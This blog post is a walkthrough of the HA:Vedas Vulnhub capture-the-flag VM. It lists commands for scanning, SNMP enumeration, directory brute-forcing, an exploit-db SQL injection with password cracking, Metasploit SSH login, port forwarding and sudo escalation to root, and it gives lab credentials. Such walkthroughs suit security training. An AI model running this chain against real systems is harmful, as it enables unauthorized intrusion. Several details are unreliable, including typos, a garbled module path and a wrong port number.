HA: Vedas Vulnhub Walkthrough

at 9:44 AM Tuesday, November 10, 2020

Today we will be cracking this Vulnerable Machine VM Called HA:Vedas. It is a capture-the-flag kind of challenge. It contains four flags based on the four Vedas of Hinduism and all the flags are related to one another. You can Download the flag from Here.

Power on Kali Linux as your attacker machine and lets get started.

Penetration Testing Methodology

·        Network Scanning

o   Netdiscover

o   Nmap

·        Flag 1

·        Flag 2

·        Flag 3

·        Flag 4

The Walkthrough

Network Scanning

Let us begin with looking for the IP address of the machine that we need to attack which can be performed using Netdiscover command. Now when the IP addresses are being scanned, you have to understand the relation of the IP address and MAC address. So here, we would choose the machines with Hostname, VMware. The IP address that was found was 192.168.0.163. To find the IP address, you can type,

netdiscover

 



After the netdiscover scan, we can follow the network scanning using Nmap to discover all the active services and port that are open and running on the virtual machine. An aggressive scan of nmap will show that there are two services running: SSH (22) and HTTP (80) on the virtual machine.

nmap -A 192.168.0.163

On performing a UDP scan, you will see that an snmp (169) service is running and can be useful for exploitation.

nmap -sU 192.168.0.163



# Flag 1

We have found out that in an nmap scan we have discovered snmp to enumerate the machine we will start the msfconsole and make use of auxiliary module and use snmp_enum. Here we will also set the rhosts and exploit.

use auxiliary/scanner/snmp/snmp_enum

Set rhosts 192.168.0.163

Exploit

Here you will see that you have found the first flag by the name snmp.



# Flag 2

We can now have a look at the HTTP service running in the virtual machine using the web browser.

http://192.168.0.163


 

Here we try cewl command to create a dictionary of words present on the webpage

cewl http://192.168.0.163/ > dict.txt



Now that the dictionary has been created, we can use it make a dirb scan on the web page to find any hidden directories.

dirb http://192.168.0.163/ dict.txt

Here you will find a directory named Kashyapa



When you type the name of the directory in the url, a CMS page will load.

 


When you look up the web for any exploit that can be used for CMS, You can visit www.exploit-db.com for more details on the exploit.

 


The name of the exploit used is SQL injection for CMS and is downloaded.

 


 

Now run this exploit in the folder it was downloaded in and the path of the CMS directory is put and the dictionary for the passwords is also mentioned to be cracked.

Python 46635.py -u http://192.168.0.163 /Kashyapa/ --crack -w /root/dict.txt



Here you see that you have found the username and the password for webpage which are atri:ansuya



Now you can go to the web page and add /admin/login.php to open the login page of the Virtual machine. Enter the username and the passwords that was found.



On entering the password, you will see the second flag present in the content of the CMS login page. The second flag has name of the seconf veda, Yahur Veda.



Now let us move on to finding the third flag.

#Flag 3

In the first step of network scanning we had found that the ssh port was open. So here we will open msfconsole and make use of auxiliary module to exploit the ssh login in the virtual machine.

Use auxiliary/scanner/scanner/ssh/ssh_login

set rhosts 192.168.0.163

set username atri

set password anasuya

exploit

Here you will see the username and the password are successfully attempted and a session is created. Now let us check the session 1 that is created

sessions -u 1

To generate the meterpreter session, lets connect with session 2

sessions 2

Such that the meterpreter session has been created, you can use the netstat command to check the active connections and the established connections and here you notice that the IP 127.0.01 and the port 5000 is listening.

Therefore, we will make use of port forwarding to create a local TCP port relay.

portfwd add -l 5000 -p 5000 -r 127.0.0.1



In the web browser, you will see that there is the third flag waiting for you with the name Sama Veda.



Here the magic hash has been used and the output received has been looked up on the browser and its way 2 root value is also displayed.



Now let’s look for the final root flag. You have the ID and password for the ssh user atri , now enter the password. Now you are inside the user atri. Go to the home directory and list all the users in the Virtual machine.

ssh atri@192.168.0.163

cd /home

ls

You see that there is another user with the name vedas. Let us login to this user to find the final flag.

su vedas

sudo -l

sudo bash

Now after changing the directory to root and list the contents of the directory.

cd /root

ls

cat final.txt

Here you go! You have found the final flag. The HA:Vedas virtual machine is rooted.



Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)